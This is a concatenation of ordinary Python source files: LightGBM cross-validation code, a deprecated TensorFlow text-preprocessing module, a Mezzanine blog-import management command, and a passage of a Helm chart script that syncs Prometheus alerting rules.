booster.best_score = collections.defaultdict(collections.OrderedDict)
for dataset_name, eval_name, score, _ in evaluation_result_list:
booster.best_score[dataset_name][eval_name] = score
if not keep_training_booster:
booster.model_from_string(booster.model_to_string()).free_dataset()
return booster
class CVBooster:
"""CVBooster in LightGBM.
Auxiliary data structure to hold and redirect all boosters of ``cv`` function.
This class has the same methods as Booster class.
All method calls are actually performed for underlying Boosters and then all returned results are returned in a list.
Attributes
----------
boosters : list of Booster
The list of underlying fitted models.
best_iteration : int
The best iteration of fitted model.
"""
def __init__(self):
"""Initialize the CVBooster.
Generally, no need to instantiate manually.
"""
self.boosters = []
self.best_iteration = -1
def _append(self, booster):
"""Add a booster to CVBooster."""
self.boosters.append(booster)
def __getattr__(self, name):
"""Redirect methods call of CVBooster."""
def handler_function(*args, **kwargs):
"""Call methods with each booster, and concatenate their results."""
ret = []
for booster in self.boosters:
ret.append(getattr(booster, name)(*args, **kwargs))
return ret
return handler_function
def _make_n_folds(full_data, folds, nfold, params, seed, fpreproc=None, stratified=True,
shuffle=True, eval_train_metric=False):
"""Make a n-fold list of Booster from random indices."""
full_data = full_data.construct()
num_data = full_data.num_data()
if folds is not None:
if not hasattr(folds, '__iter__') and not hasattr(folds, 'split'):
raise AttributeError("folds should be a generator or iterator of (train_idx, test_idx) tuples "
"or scikit-learn splitter object with split method")
if hasattr(folds, 'split'):
group_info = full_data.get_group()
if group_info is not None:
group_info = np.array(group_info, dtype=np.int32, copy=False)
flatted_group = np.repeat(range(len(group_info)), repeats=group_info)
else:
flatted_group = np.zeros(num_data, dtype=np.int32)
folds = folds.split(X=np.empty(num_data), y=full_data.get_label(), groups=flatted_group)
else:
if any(params.get(obj_alias, "") in {"lambdarank", "rank_xendcg", "xendcg",
"xe_ndcg", "xe_ndcg_mart", "xendcg_mart"}
for obj_alias in _ConfigAliases.get("objective")):
if not SKLEARN_INSTALLED:
raise LightGBMError('scikit-learn is required for ranking cv')
# ranking task, split according to groups
group_info = np.array(full_data.get_group(), dtype=np.int32, copy=False)
flatted_group = np.repeat(range(len(group_info)), repeats=group_info)
group_kfold = _LGBMGroupKFold(n_splits=nfold)
folds = group_kfold.split(X=np.empty(num_data), groups=flatted_group)
elif stratified:
if not SKLEARN_INSTALLED:
raise LightGBMError('scikit-learn is required for stratified cv')
skf = _LGBMStratifiedKFold(n_splits=nfold, shuffle=shuffle, random_state=seed)
folds = skf.split(X=np.empty(num_data), y=full_data.get_label())
else:
if shuffle:
randidx = np.random.RandomState(seed).permutation(num_data)
else:
randidx = np.arange(num_data)
kstep = int(num_data / nfold)
test_id = [randidx[i: i + kstep] for i in range(0, num_data, kstep)]
train_id = [np.concatenate([test_id[i] for i in range(nfold) if k != i]) for k in range(nfold)]
folds = zip(train_id, test_id)
ret = CVBooster()
for train_idx, test_idx in folds:
train_set = full_data.subset(sorted(train_idx))
valid_set = full_data.subset(sorted(test_idx))
# run preprocessing on the data set if needed
if fpreproc is not None:
train_set, valid_set, tparam = fpreproc(train_set, valid_set, params.copy())
else:
tparam = params
cvbooster = Booster(tparam, train_set)
if eval_train_metric:
cvbooster.add_valid(train_set, 'train')
cvbooster.add_valid(valid_set, 'valid')
ret._append(cvbooster)
return ret
def _agg_cv_result(raw_results, eval_train_metric=False):
"""Aggregate cross-validation results."""
cvmap = collections.OrderedDict()
metric_type = {}
for one_result in raw_results:
for one_line in one_result:
if eval_train_metric:
key = f"{one_line[0]} {one_line[1]}"
else:
key = one_line[1]
metric_type[key] = one_line[3]
cvmap.setdefault(key, [])
cvmap[key].append(one_line[2])
return [('cv_agg', k, np.mean(v), metric_type[k], np.std(v)) for k, v in cvmap.items()]
def cv(params, train_set, num_boost_round=100,
folds=None, nfold=5, stratified=True, shuffle=True,
metrics=None, fobj=None, feval=None, init_model=None,
feature_name='auto', categorical_feature='auto',
fpreproc=None, seed=0, callbacks=None, eval_train_metric=False,
return_cvbooster=False):
"""Perform the cross-validation with given parameters.
Parameters
----------
params : dict
Parameters for Booster.
train_set : Dataset
Data to be trained on.
num_boost_round : int, optional (default=100)
Number of boosting iterations.
folds : generator or iterator of (train_idx, test_idx) tuples, scikit-learn splitter object or None, optional (default=None)
If generator or iterator, it should yield the train and test indices for each fold.
If object, it should be one of the scikit-learn splitter classes
(https://scikit-learn.org/stable/modules/classes.html#splitter-classes)
and have ``split`` method.
This argument has highest priority over other data split arguments.
nfold : int, optional (default=5)
Number of folds in CV.
stratified : bool, optional (default=True)
Whether to perform stratified sampling.
shuffle : bool, optional (default=True)
Whether to shuffle before splitting data.
metrics : str, list of str, or None, optional (default=None)
Evaluation metrics to be monitored while CV.
If not None, the metric in ``params`` will be overridden.
fobj : callable or None, optional (default=None)
Customized objective function.
Should accept two parameters: preds, train_data,
and return (grad, hess).
preds : numpy 1-D array
The predicted values.
Predicted values are returned before any transformation,
e.g. they are raw margin instead of probability of positive class for binary task.
train_data : Dataset
The training dataset.
grad : list, numpy 1-D array or pandas Series
The value of the first order derivative (gradient) of the loss
with respect to the elements of preds for each sample point.
hess : list, numpy 1-D array or pandas Series
The value of the second order derivative (Hessian) of the loss
with respect to the elements of preds for each sample point.
For multi-class task, the preds is group by class_id first, then group by row_id.
If you want to get i-th row preds in j-th class, the access way is score[j * num_data + i]
and you should group grad and hess in this way as well.
feval : callable, list of callable, or None, optional (default=None)
Customized evaluation function.
Each evaluation function should accept two parameters: preds, train_data,
and return (eval_name, eval_result, is_higher_better) or list of such tuples.
preds : numpy 1-D array
The predicted values.
If ``fobj`` is specified, predicted values are returned before any transformation,
e.g. they are raw margin instead of probability of positive class for binary task in this case.
train_data : Dataset
The training dataset.
eval_name : str
The name of evaluation function (without whitespace).
eval_result : float
The eval result.
is_higher_better : bool
Is eval result higher better, e.g. AUC is ``is_higher_better``.
For multi-class task, the preds is group by class_id first, then group by row_id.
If you want to get i-th row preds in j-th class, the access way is preds[j * num_data + i].
To ignore the default metric corresponding to the used objective,
set ``metrics`` to the string ``"None"``.
init_model : str, pathlib.Path, Booster or None, optional (default=None)
Filename of LightGBM model or Booster instance used for continue training.
feature_name : list of str, or 'auto', optional (default="auto")
Feature names.
If 'auto' and data is pandas DataFrame, data columns names are used.
categorical_feature : list of str or int, or 'auto', optional (default="auto")
Categorical features.
If list of int, interpreted as indices.
If list of str, interpreted as feature names (need to specify ``feature_name`` as well).
If 'auto' and data is pandas DataFrame, pandas unordered categorical columns are used.
All values in categorical features should be less than int32 max value (2147483647).
Large values could be memory consuming. Consider using consecutive integers starting from zero.
All negative values in categorical features will be treated as missing values.
The output cannot be monotonically constrained with respect to a categorical feature.
fpreproc : callable or None, optional (default=None)
Preprocessing function that takes (dtrain, dtest, params)
and returns transformed versions of those.
seed : int, optional (default=0)
Seed used to generate the folds (passed to numpy.random.seed).
callbacks : list of callable, or None, optional (default=None)
List of callback functions that are applied at each iteration.
See Callbacks in Python API for more information.
eval_train_metric : bool, optional (default=False)
Whether to display the train metric in progress.
The score of the metric is calculated again after each training step, so there is some impact on performance.
return_cvbooster : bool, optional (default=False)
Whether to return Booster models trained on each fold through ``CVBooster``.
Returns
-------
eval_hist : dict
Evaluation history.
The dictionary has the following format:
{'metric1-mean': [values], 'metric1-stdv': [values],
'metric2-mean': [values], 'metric2-stdv': [values],
...}.
If ``return_cvbooster=True``, also returns trained boosters via ``cvbooster`` key.
"""
if not isinstance(train_set, Dataset):
raise TypeError("Training only accepts Dataset object")
params = copy.deepcopy(params)
if fobj is not None:
for obj_alias in _ConfigAliases.get("objective"):
params.pop(obj_alias, None)
params['objective'] = 'none'
for alias in _ConfigAliases.get("num_iterations"):
if alias in params:
_log_warning(f"Found '{alias}' in params. Will use it instead of 'num_boost_round' argument")
num_boost_round = params.pop(alias)
params["num_iterations"] = num_boost_round
# setting early stopping via global params should be possible
params = _choose_param_value(
main_param_name="early_stopping_round",
params=params,
default_value=None
)
if params["early_stopping_round"] is None:
params.pop("early_stopping_round")
first_metric_only = params.get('first_metric_only', False)
if num_boost_round <= 0:
raise ValueError("num_boost_round should be greater than zero.")
if isinstance(init_model, (str, Path)):
predictor = _InnerPredictor(model_file=init_model, pred_parameter=params)
elif isinstance(init_model, Booster):
predictor = init_model._to_predictor(dict(init_model.params, **params))
else:
predictor = None
if metrics is not None:
for metric_alias in _ConfigAliases.get("metric"):
params.pop(metric_alias, None)
params['metric'] = metrics
train_set._update_params(params) \
._set_predictor(predictor) \
.set_feature_name(feature_name) \
.set_categorical_feature(categorical_feature)
results = collections.defaultdict(list)
cvfolds = _make_n_folds(train_set, folds=folds, nfold=nfold,
params=params, seed=seed, fpreproc=fpreproc,
stratified=stratified, shuffle=shuffle,
eval_train_metric=eval_train_metric)
# setup callbacks
if callbacks is None:
callbacks = set()
else:
for i, cb in enumerate(callbacks):
cb.__dict__.setdefault('order', i - len(callbacks))
callbacks = set(callbacks)
if "early_stopping_round" in params:
callbacks.add(
callback.early_stopping(
stopping_rounds=params["early_stopping_round"],
first_metric_only=first_metric_only,
verbose=_choose_param_value(
main_param_name="verbosity",
params=params,
default_value=1
).pop("verbosity") > 0
)
)
callbacks_before_iter = {cb for cb in callbacks if getattr(cb, 'before_iteration', False)}
callbacks_after_iter = callbacks - callbacks_before_iter
callbacks_before_iter = sorted(callbacks_before_iter, key=attrgetter('order'))
callbacks_after_iter = sorted(callbacks_after_iter, key=attrgetter('order'))
for i in range(num_boost_round):
for cb in callbacks_before_iter:
cb(callback.CallbackEnv(model=cvfolds,
params=params,
iteration=i,
begin_iteration=0,
end_iteration=num_boost_round,
evaluation_result_list=None))
cvfolds.update(fobj=fobj)
res = _agg_cv_result(cvfolds.eval_valid(feval), eval_train_metric)
for _, key, mean, _, std in res:
results[f'{key}-mean'].append(mean)
results[f'{key}-stdv'].append(std)
try:
for cb in callbacks_after_iter:
cb(callback.CallbackEnv(model=cvfolds,
params=params,
iteration=i,
begin_iteration=0,
end_iteration=num_boost_round,
evaluation_result_list=res))
except callback.EarlyStopException as earlyStopException:
cvfolds.best_iteration = earlyStopException.best_iteration + 1
for k in results:
results[k] = results[k][:cvfolds.best_iteration]
break
if return_cvbooster:
results['cvbooster'] = cvfolds
return dict(results)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implements a number of text preprocessing utilities (deprecated).
This module and all its submodules are deprecated. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for migration instructions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import numpy as np
import six
from tensorflow.python.platform import gfile
from tensorflow.python.util.deprecation import deprecated
from .categorical_vocabulary import CategoricalVocabulary # pylint: disable=g-bad-import-order
try:
# pylint: disable=g-import-not-at-top
import cPickle as pickle
except ImportError:
# pylint: disable=g-import-not-at-top
import pickle
TOKENIZER_RE = re.compile(r"[A-Z]{2,}(?![a-z])|[A-Z][a-z]+(?=[A-Z])|[\'\w\-]+",
re.UNICODE)
@deprecated(None, 'Please use tensorflow/transform or tf.data.')
def tokenizer(iterator):
"""Tokenizer generator.
Args:
iterator: Input iterator with strings.
Yields:
array of tokens per each value in the input.
"""
for value in iterator:
yield TOKENIZER_RE.findall(value)
@deprecated(None, 'Please use tensorflow/transform or tf.data.')
class ByteProcessor(object):
"""Maps documents into sequence of ids for bytes.
THIS CLASS IS DEPRECATED. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for general migration instructions.
"""
@deprecated(None, 'Please use tensorflow/transform or tf.data.')
def __init__(self, max_document_length):
self.max_document_length = max_document_length
def fit(self, x):
"""Does nothing. No fitting required."""
pass
def fit_transform(self, x):
"""Calls transform."""
return self.transform(x)
# pylint: disable=no-self-use
def reverse(self, x):
"""Reverses output of transform back to text.
Args:
x: iterator or matrix of integers. Document representation in bytes.
Yields:
Iterators of utf-8 strings.
"""
for data in x:
document = np.trim_zeros(data.astype(np.int8), trim='b').tostring()
try:
yield document.decode('utf-8')
except UnicodeDecodeError:
yield ''
def transform(self, x):
"""Transforms input documents into sequence of ids.
Args:
x: iterator or list of input documents.
Documents can be bytes or unicode strings, which will be encoded as
utf-8 to map to bytes. Note, in Python2 str and bytes is the same type.
Yields:
iterator of byte ids.
"""
if six.PY3:
# For Python3 defined buffer as memoryview.
buffer_or_memoryview = memoryview
else:
buffer_or_memoryview = buffer # pylint: disable=undefined-variable
for document in x:
if isinstance(document, six.text_type):
document = document.encode('utf-8')
document_mv = buffer_or_memoryview(document)
buff = np.frombuffer(document_mv[:self.max_document_length],
dtype=np.uint8)
yield np.pad(buff, (0, self.max_document_length - len(buff)), 'constant')
class VocabularyProcessor(object):
"""Maps documents to sequences of word ids.
THIS CLASS IS DEPRECATED. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for general migration instructions.
"""
@deprecated(None, 'Please use tensorflow/transform or tf.data.')
def __init__(self,
max_document_length,
min_frequency=0,
vocabulary=None,
tokenizer_fn=None):
"""Initializes a VocabularyProcessor instance.
Args:
max_document_length: Maximum length of documents.
if documents are longer, they will be trimmed, if shorter - padded.
min_frequency: Minimum frequency of words in the vocabulary.
vocabulary: CategoricalVocabulary object.
Attributes:
vocabulary_: CategoricalVocabulary object.
"""
self.max_document_length = max_document_length
self.min_frequency = min_frequency
if vocabulary:
self.vocabulary_ = vocabulary
else:
self.vocabulary_ = CategoricalVocabulary()
if tokenizer_fn:
self._tokenizer = tokenizer_fn
else:
self._tokenizer = tokenizer
def fit(self, raw_documents, unused_y=None):
"""Learn a vocabulary dictionary of all tokens in the raw documents.
Args:
raw_documents: An iterable which yield either str or unicode.
unused_y: to match fit format signature of estimators.
Returns:
self
"""
for tokens in self._tokenizer(raw_documents):
for token in tokens:
self.vocabulary_.add(token)
if self.min_frequency > 0:
self.vocabulary_.trim(self.min_frequency)
self.vocabulary_.freeze()
return self
def fit_transform(self, raw_documents, unused_y=None):
"""Learn the vocabulary dictionary and return indexies of words.
Args:
raw_documents: An iterable which yield either str or unicode.
unused_y: to match fit_transform signature of estimators.
Returns:
x: iterable, [n_samples, max_document_length]. Word-id matrix.
"""
self.fit(raw_documents)
return self.transform(raw_documents)
def transform(self, raw_documents):
"""Transform documents to word-id matrix.
Convert words to ids with vocabulary fitted with fit or the one
provided in the constructor.
Args:
raw_documents: An iterable which yield either str or unicode.
Yields:
x: iterable, [n_samples, max_document_length]. Word-id matrix.
"""
for tokens in self._tokenizer(raw_documents):
word_ids = np.zeros(self.max_document_length, np.int64)
for idx, token in enumerate(tokens):
if idx >= self.max_document_length:
break
word_ids[idx] = self.vocabulary_.get(token)
yield word_ids
def reverse(self, documents):
"""Reverses output of vocabulary mapping to words.
Args:
documents: iterable, list of class ids.
Yields:
Iterator over mapped in words documents.
"""
for item in documents:
output = []
for class_id in item:
output.append(self.vocabulary_.reverse(class_id))
yield ' '.join(output)
def save(self, filename):
"""Saves vocabulary processor into given file.
Args:
filename: Path to output file.
"""
with gfile.Open(filename, 'wb') as f:
f.write(pickle.dumps(self))
@classmethod
def restore(cls, filename):
"""Restores vocabulary processor from given file.
Args:
filename: Path to file to load from.
Returns:
VocabularyProcessor object.
"""
with gfile.Open(filename, 'rb') as f:
return pickle.loads(f.read())
|
|
from __future__ import print_function, unicode_literals
from future.builtins import input, int
from optparse import make_option
try:
from urllib.parse import urlparse
except:
from urlparse import urlparse
from django.contrib.auth import get_user_model
from django.contrib.redirects.models import Redirect
from django.contrib.sites.models import Site
from django.core.management.base import BaseCommand, CommandError
from django.utils.encoding import force_text
from django.utils.html import strip_tags
from mezzanine.blog.models import BlogPost, BlogCategory
from mezzanine.conf import settings
from mezzanine.core.models import CONTENT_STATUS_DRAFT
from mezzanine.core.models import CONTENT_STATUS_PUBLISHED
from mezzanine.generic.models import AssignedKeyword, Keyword, ThreadedComment
from mezzanine.pages.models import RichTextPage
from mezzanine.utils.html import decode_entities
User = get_user_model()
class BaseImporterCommand(BaseCommand):
"""
Base importer command for blogging platform specific management
commands to subclass when importing blog posts into Mezzanine.
The ``handle_import`` method should be overridden to provide the
import mechanism specific to the blogging platform being dealt with.
"""
option_list = BaseCommand.option_list + (
make_option("-m", "--mezzanine-user", dest="mezzanine_user",
help="Mezzanine username to assign the imported blog posts to."),
make_option("--noinput", action="store_false", dest="interactive",
default=True, help="Do NOT prompt for input of any kind. "
"Fields will be truncated if too long."),
make_option("-n", "--navigation", action="store_true",
dest="in_navigation", help="Add any imported pages to navigation"),
make_option("-f", "--footer", action="store_true", dest="in_footer",
help="Add any imported pages to footer navigation"),
)
def __init__(self, **kwargs):
self.posts = []
self.pages = []
super(BaseImporterCommand, self).__init__(**kwargs)
def add_post(self, title=None, content=None, old_url=None, pub_date=None,
tags=None, categories=None, comments=None):
"""
Adds a post to the post list for processing.
- ``title`` and ``content`` are strings for the post.
- ``old_url`` is a string that a redirect will be created for.
- ``pub_date`` is assumed to be a ``datetime`` object.
- ``tags`` and ``categories`` are sequences of strings.
- ``comments`` is a sequence of dicts - each dict should be the
return value of ``add_comment``.
"""
if not title:
title = strip_tags(content).split(". ")[0]
title = decode_entities(title)
if categories is None:
categories = []
if tags is None:
tags = []
if comments is None:
comments = []
self.posts.append({
"title": force_text(title),
"publish_date": pub_date,
"content": force_text(content),
"categories": categories,
"tags": tags,
"comments": comments,
"old_url": old_url,
})
return self.posts[-1]
def add_page(self, title=None, content=None, old_url=None,
tags=None, old_id=None, old_parent_id=None):
"""
Adds a page to the list of pages to be imported - used by the
Wordpress importer.
"""
if not title:
text = decode_entities(strip_tags(content)).replace("\n", " ")
title = text.split(". ")[0]
if tags is None:
tags = []
self.pages.append({
"title": title,
"content": content,
"tags": tags,
"old_url": old_url,
"old_id": old_id,
"old_parent_id": old_parent_id,
})
def add_comment(self, post=None, name=None, email=None, pub_date=None,
website=None, body=None):
"""
Adds a comment to the post provided.
"""
if post is None:
if not self.posts:
raise CommandError("Cannot add comments without posts")
post = self.posts[-1]
post["comments"].append({
"user_name": name,
"user_email": email,
"submit_date": pub_date,
"user_url": website,
"comment": body,
})
def trunc(self, model, prompt, **fields):
"""
Truncates fields values for the given model. Prompts for a new
value if truncation occurs.
"""
for field_name, value in fields.items():
field = model._meta.get_field(field_name)
max_length = getattr(field, "max_length", None)
if not max_length:
continue
elif not prompt:
fields[field_name] = value[:max_length]
continue
while len(value) > max_length:
encoded_value = value.encode("utf-8")
new_value = input("The value for the field %s.%s exceeds "
"its maximum length of %s chars: %s\n\nEnter a new value "
"for it, or press return to have it truncated: " %
(model.__name__, field_name, max_length, encoded_value))
value = new_value if new_value else value[:max_length]
fields[field_name] = value
return fields
def handle(self, *args, **options):
"""
Processes the converted data into the Mezzanine database correctly.
Attributes:
mezzanine_user: the user to put this data in against
date_format: the format the dates are in for posts and comments
"""
mezzanine_user = options.get("mezzanine_user")
site = Site.objects.get_current()
verbosity = int(options.get("verbosity", 1))
prompt = options.get("interactive")
# Validate the Mezzanine user.
if mezzanine_user is None:
raise CommandError("No Mezzanine user has been specified")
try:
mezzanine_user = User.objects.get(username=mezzanine_user)
except User.DoesNotExist:
raise CommandError("Invalid Mezzanine user: %s" % mezzanine_user)
# Run the subclassed ``handle_import`` and save posts, tags,
# categories, and comments to the DB.
self.handle_import(options)
for post_data in self.posts:
categories = post_data.pop("categories")
tags = post_data.pop("tags")
comments = post_data.pop("comments")
old_url = post_data.pop("old_url")
post_data = self.trunc(BlogPost, prompt, **post_data)
initial = {
"title": post_data.pop("title"),
"user": mezzanine_user,
}
if post_data["publish_date"] is None:
post_data["status"] = CONTENT_STATUS_DRAFT
post, created = BlogPost.objects.get_or_create(**initial)
for k, v in post_data.items():
setattr(post, k, v)
post.save()
if created and verbosity >= 1:
print("Imported post: %s" % post)
for name in categories:
cat = self.trunc(BlogCategory, prompt, title=name)
if not cat["title"]:
continue
cat, created = BlogCategory.objects.get_or_create(**cat)
if created and verbosity >= 1:
print("Imported category: %s" % cat)
post.categories.add(cat)
for comment in comments:
comment = self.trunc(ThreadedComment, prompt, **comment)
comment["site"] = site
post.comments.create(**comment)
if verbosity >= 1:
print("Imported comment by: %s" % comment["user_name"])
self.add_meta(post, tags, prompt, verbosity, old_url)
# Create any pages imported (Wordpress can include pages)
in_menus = []
footer = [menu[0] for menu in settings.PAGE_MENU_TEMPLATES
if menu[-1] == "pages/menus/footer.html"]
if options["in_navigation"]:
in_menus = [menu[0] for menu in settings.PAGE_MENU_TEMPLATES]
if footer and not options["in_footer"]:
in_menus.remove(footer[0])
elif footer and options["in_footer"]:
in_menus = footer
parents = []
for page in self.pages:
tags = page.pop("tags")
old_url = page.pop("old_url")
old_id = page.pop("old_id")
old_parent_id = page.pop("old_parent_id")
page = self.trunc(RichTextPage, prompt, **page)
page["status"] = CONTENT_STATUS_PUBLISHED
page["in_menus"] = in_menus
page, created = RichTextPage.objects.get_or_create(**page)
if created and verbosity >= 1:
print("Imported page: %s" % page)
self.add_meta(page, tags, prompt, verbosity, old_url)
parents.append({
'old_id': old_id,
'old_parent_id': old_parent_id,
'page': page,
})
for obj in parents:
if obj['old_parent_id']:
for parent in parents:
if parent['old_id'] == obj['old_parent_id']:
obj['page'].parent = parent['page']
obj['page'].save()
break
def add_meta(self, obj, tags, prompt, verbosity, old_url=None):
"""
Adds tags and a redirect for the given obj, which is a blog
post or a page.
"""
for tag in tags:
keyword = self.trunc(Keyword, prompt, title=tag)
keyword, created = Keyword.objects.get_or_create_iexact(**keyword)
obj.keywords.create(keyword=keyword)
if created and verbosity >= 1:
print("Imported tag: %s" % keyword)
if old_url is not None:
old_path = urlparse(old_url).path
if not old_path.strip("/"):
return
redirect = self.trunc(Redirect, prompt, old_path=old_path)
redirect['site'] = Site.objects.get_current()
redirect, created = Redirect.objects.get_or_create(**redirect)
redirect.new_path = obj.get_absolute_url()
redirect.save()
if created and verbosity >= 1:
print("Created redirect for: %s" % old_url)
def handle_import(self, options):
"""
Should be overridden by subclasses - performs the conversion from
the originating data source into the lists of posts and comments
ready for processing.
"""
raise NotImplementedError
|
|
#!/usr/bin/env python3
"""Fetch alerting and aggregation rules from provided urls into this chart."""
import textwrap
from os import makedirs
import requests
import yaml
from yaml.representer import SafeRepresenter
# https://stackoverflow.com/a/20863889/961092
class LiteralStr(str):
pass
def change_style(style, representer):
def new_representer(dumper, data):
scalar = representer(dumper, data)
scalar.style = style
return scalar
return new_representer
# Source files list
charts = [
{
'source': 'https://raw.githubusercontent.com/coreos/kube-prometheus/master/manifests/prometheus-rules.yaml',
'destination': '../templates/prometheus/rules-1.14',
'min_kubernetes': '1.14.0-0'
},
{
'source': 'https://raw.githubusercontent.com/etcd-io/etcd/master/Documentation/op-guide/etcd3_alert.rules.yml',
'destination': '../templates/prometheus/rules-1.14',
'min_kubernetes': '1.14.0-0'
},
{
'source': 'https://raw.githubusercontent.com/coreos/kube-prometheus/release-0.1/manifests/prometheus-rules.yaml',
'destination': '../templates/prometheus/rules',
'min_kubernetes': '1.10.0-0',
'max_kubernetes': '1.14.0-0'
},
{
'source': 'https://raw.githubusercontent.com/etcd-io/etcd/master/Documentation/op-guide/etcd3_alert.rules.yml',
'destination': '../templates/prometheus/rules',
'min_kubernetes': '1.10.0-0',
'max_kubernetes': '1.14.0-0'
},
]
# Additional conditions map
condition_map = {
'alertmanager.rules': ' .Values.defaultRules.rules.alertmanager',
'general.rules': ' .Values.defaultRules.rules.general',
'k8s.rules': ' .Values.defaultRules.rules.k8s',
'kube-apiserver.rules': ' .Values.kubeApiServer.enabled .Values.defaultRules.rules.kubeApiserver',
'kube-prometheus-node-alerting.rules': ' .Values.defaultRules.rules.kubePrometheusNodeAlerting',
'kube-prometheus-node-recording.rules': ' .Values.defaultRules.rules.kubePrometheusNodeRecording',
'kube-scheduler.rules': ' .Values.kubeScheduler.enabled .Values.defaultRules.rules.kubeScheduler',
'kubernetes-absent': ' .Values.defaultRules.rules.kubernetesAbsent',
'kubernetes-resources': ' .Values.defaultRules.rules.kubernetesResources',
'kubernetes-storage': ' .Values.defaultRules.rules.kubernetesStorage',
'kubernetes-system': ' .Values.defaultRules.rules.kubernetesSystem',
'kubernetes-system-controller-manager': ' .Values.kubeControllerManager.enabled',
'kubernetes-system-scheduler': ' .Values.kubeScheduler.enabled .Values.defaultRules.rules.kubeScheduler',
'node-exporter.rules': ' .Values.nodeExporter.enabled .Values.defaultRules.rules.node',
'node-exporter': ' .Values.nodeExporter.enabled .Values.defaultRules.rules.node',
'node.rules': ' .Values.nodeExporter.enabled .Values.defaultRules.rules.node',
'node-network': ' .Values.defaultRules.rules.network',
'node-time': ' .Values.defaultRules.rules.time',
'prometheus-operator': ' .Values.defaultRules.rules.prometheusOperator',
'prometheus.rules': ' .Values.defaultRules.rules.prometheus',
'kubernetes-apps': ' .Values.kubeStateMetrics.enabled .Values.defaultRules.rules.kubernetesApps',
'etcd': ' .Values.kubeEtcd.enabled .Values.defaultRules.rules.etcd',
}
alert_condition_map = {
'KubeAPIDown': '.Values.kubeApiServer.enabled', # there are more alerts which are left enabled, because they'll never fire without metrics
'KubeControllerManagerDown': '.Values.kubeControllerManager.enabled',
'KubeSchedulerDown': '.Values.kubeScheduler.enabled',
'KubeStateMetricsDown': '.Values.kubeStateMetrics.enabled', # there are more alerts which are left enabled, because they'll never fire without metrics
'KubeletDown': '.Values.prometheusOperator.kubeletService.enabled', # there are more alerts which are left enabled, because they'll never fire without metrics
'PrometheusOperatorDown': '.Values.prometheusOperator.enabled',
'NodeExporterDown': '.Values.nodeExporter.enabled',
'CoreDNSDown': '.Values.kubeDns.enabled',
'AlertmanagerDown': '.Values.alertmanager.enabled',
}
replacement_map = {
'job="prometheus-operator"': {
'replacement': 'job="{{ $operatorJob }}"',
'init': '{{- $operatorJob := printf "%s-%s" (include "prometheus-operator.fullname" .) "operator" }}'},
'job="prometheus-k8s"': {
'replacement': 'job="{{ $prometheusJob }}"',
'init': '{{- $prometheusJob := printf "%s-%s" (include "prometheus-operator.fullname" .) "prometheus" }}'},
'job="alertmanager-main"': {
'replacement': 'job="{{ $alertmanagerJob }}"',
'init': '{{- $alertmanagerJob := printf "%s-%s" (include "prometheus-operator.fullname" .) "alertmanager" }}'},
'namespace="monitoring"': {
'replacement': 'namespace="{{ $namespace }}"',
'init': '{{- $namespace := .Release.Namespace }}'},
'alertmanager-$1': {
'replacement': '$1',
'init': ''},
}
# standard header
header = '''# Generated from '%(name)s' group from %(url)s
# Do not change in-place! In order to change this file first read following link:
# https://github.com/helm/charts/tree/master/stable/prometheus-operator/hack
{{- $kubeTargetVersion := default .Capabilities.KubeVersion.GitVersion .Values.kubeTargetVersionOverride }}
{{- if and (semverCompare ">=%(min_kubernetes)s" $kubeTargetVersion) (semverCompare "<%(max_kubernetes)s" $kubeTargetVersion) .Values.defaultRules.create%(condition)s }}%(init_line)s
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
name: {{ printf "%%s-%%s" (include "prometheus-operator.fullname" .) "%(name)s" | trunc 63 | trimSuffix "-" }}
labels:
app: {{ template "prometheus-operator.name" . }}
{{ include "prometheus-operator.labels" . | indent 4 }}
{{- if .Values.defaultRules.labels }}
{{ toYaml .Values.defaultRules.labels | indent 4 }}
{{- end }}
{{- if .Values.defaultRules.annotations }}
annotations:
{{ toYaml .Values.defaultRules.annotations | indent 4 }}
{{- end }}
spec:
groups:
-'''
def init_yaml_styles():
represent_literal_str = change_style('|', SafeRepresenter.represent_str)
yaml.add_representer(LiteralStr, represent_literal_str)
def escape(s):
return s.replace("{{", "{{`{{").replace("}}", "}}`}}")
def fix_expr(rules):
"""Remove trailing whitespaces and line breaks, which happen to creep in
due to yaml import specifics;
convert multiline expressions to literal style, |-"""
for rule in rules:
rule['expr'] = rule['expr'].rstrip()
if '\n' in rule['expr']:
rule['expr'] = LiteralStr(rule['expr'])
def yaml_str_repr(struct, indent=4):
"""represent yaml as a string"""
text = yaml.dump(
struct,
width=1000, # to disable line wrapping
default_flow_style=False # to disable multiple items on single line
)
text = escape(text) # escape {{ and }} for helm
text = textwrap.indent(text, ' ' * indent)[indent - 1:] # indent everything, and remove very first line extra indentation
return text
def add_rules_conditions(rules, indent=4):
"""Add if wrapper for rules, listed in alert_condition_map"""
rule_condition = '{{- if %s }}\n'
for alert_name in alert_condition_map:
line_start = ' ' * indent + '- alert: '
if line_start + alert_name in rules:
rule_text = rule_condition % alert_condition_map[alert_name]
# add if condition
index = rules.index(line_start + alert_name)
rules = rules[:index] + rule_text + rules[index:]
# add end of if
try:
next_index = rules.index(line_start, index + len(rule_text) + 1)
except ValueError:
# we found the last alert in file if there are no alerts after it
next_index = len(rules)
# depending on the rule ordering in alert_condition_map it's possible that an if statement from another rule is present at the end of this block.
found_block_end = False
last_line_index = next_index
while not found_block_end:
last_line_index = rules.rindex('\n', index, last_line_index - 1) # find the starting position of the last line
last_line = rules[last_line_index + 1:next_index]
if last_line.startswith('{{- if'):
next_index = last_line_index + 1 # move next_index back if the current block ends in an if statement
continue
found_block_end = True
rules = rules[:next_index] + '{{- end }}\n' + rules[next_index:]
return rules
def write_group_to_file(group, url, destination, min_kubernetes, max_kubernetes):
fix_expr(group['rules'])
# prepare rules string representation
rules = yaml_str_repr(group)
# add replacements of custom variables and include their initialisation in case it's needed
init_line = ''
for line in replacement_map:
if line in rules:
rules = rules.replace(line, replacement_map[line]['replacement'])
